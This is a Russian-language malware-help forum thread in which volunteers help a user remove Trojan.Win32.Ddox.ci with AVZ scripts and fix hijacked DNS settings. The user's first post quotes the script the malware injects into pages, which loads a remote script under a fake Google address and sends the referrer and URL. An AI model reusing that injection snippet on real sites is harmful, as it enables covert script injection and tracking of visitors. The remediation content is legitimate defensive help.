Показано с 1 по 13 из 13.

Trojan.Win32.Ddox.ci и код "google" (заявка № 100491)

  1. #1
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57

    Exclamation Trojan.Win32.Ddox.ci и код "google"

    Помогите пожалуйста удалить вирус.

    В браузере появляется сообщение о Trojan.Win32.Ddox.ci
    а так же в низ кода страницы перед /body добавляется код якобы google:

    Код HTML:
    <script>if(self==top){
    document.write("<script src='http" +
    (("https:" == document.location.protocol) ? "s" : "") +
    "://sites.google.com/static.js?t=stat&ran=i1p8bGVNPxYwm9eeGX7op7jnlCuPEELvG3XrSO8j1WztJnDRqi8a2JxY7IN/b4KLBM18c5DhdoY_&r="+escape(document.referrer)+"&u="+escape(document.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
    Еще не открывается вкладка "Сервис" в IE (но возможно это появилось раньше)

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.01.2007
    Сообщений
    22,817
    Вес репутации
    1523
    выполните скрипт
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     QuarantineFile('C:\WINDOWS\system32\hbtante.dll','');
     DeleteFile('C:\WINDOWS\system32\hbtante.dll');
    BC_ImportDeletedList;
    ExecuteSysClean;
    ExecuteRepair(16); 
    BC_Activate;
    RebootWindows(true);
    end.
    пришлите карантин согласно приложения 3 паравил
    повторите логи

  4. #3
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57
    Большое спасибо!
    А отсутствие возможности открыть вкладку "Сервис" в IE (пишет: Операция отменена из-из действующих ограничений), это не вирус?

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.01.2007
    Сообщений
    22,817
    Вес репутации
    1523
    где повторные логи ?

  6. #5
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57
    Логи

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    26.12.2006
    Адрес
    Vladivostok
    Сообщений
    23,298
    Вес репутации
    1578
    Заразы в логах больше не видно.

    Выполните скрипт в AVZ:
    Код:
    begin
    ExecuteRepair(6);
    ExecuteRepair(8);
    RegKeyIntParamWrite( 'HKLM', 'SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum', '{BDEADF00-C265-11D0-BCED-00A0C90AB50F}', 1);
    RebootWindows(true); 
    end.
    Компьютер перезагрузится.

    Проверьте, решилась ли проблема с IE?
    I am not young enough to know everything...

  8. #7
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57
    Нет, с IE - все так же.

  9. #8
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    26.12.2006
    Адрес
    Vladivostok
    Сообщений
    23,298
    Вес репутации
    1578
    http://virusinfo.info/showthread.php?t=93621
    попробуйте п.2 и 3.
    I am not young enough to know everything...

  10. #9
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57
    Спасибо, но и это не помогает...

  11. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.01.2007
    Сообщений
    22,817
    Вес репутации
    1523
    195.226.220.30,195.226.220.31 - вы уверены что это ваши ДНС серверы ?

  12. #11
    Junior Member Репутация
    Регистрация
    25.08.2008
    Сообщений
    26
    Вес репутации
    57
    Если честно, я не знаю, что это и не совсем понимаю вопрос

  13. #12
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Пофиксите в HiJack
    Код:
    O17 - HKLM\System\CCS\Services\Tcpip\..\{DB90DB92-0AB9-40F2-AB0C-EB62983F7DDB}: NameServer = 195.226.220.30,195.226.220.31
    Если пропадет Интернет, посмотрите в договоре с провайдером (или позвоните в их техподдержку) правильные адреса DNS-серверов и пропишите их в настройках подключения к Интернет
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  14. #13
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 1
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\\windows\\system32\\hbtante.dll - Trojan.Win32.Zapchast.fgg ( DrWEB: Trojan.Mayachok.based, BitDefender: Trojan.Generic.5795057, AVAST4: Win32:MalOb-HG [Cryp] )


  • Уважаемый(ая) bruto, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 11.08.2011, 14:35
    2. проблемы - "Trojan.Win32.Ddox.ci" и rostelecom.ru
      От Шома в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 07.08.2011, 14:50
    3. Ответов: 4
      Последнее сообщение: 23.07.2011, 07:13
    4. "В системе обнаружен вирус: Trojan.Win32.Ddox.ci "
      От johnnyhey в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 23.06.2011, 22:02
    5. Ответов: 12
      Последнее сообщение: 23.06.2011, 03:32

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00021 seconds with 17 queries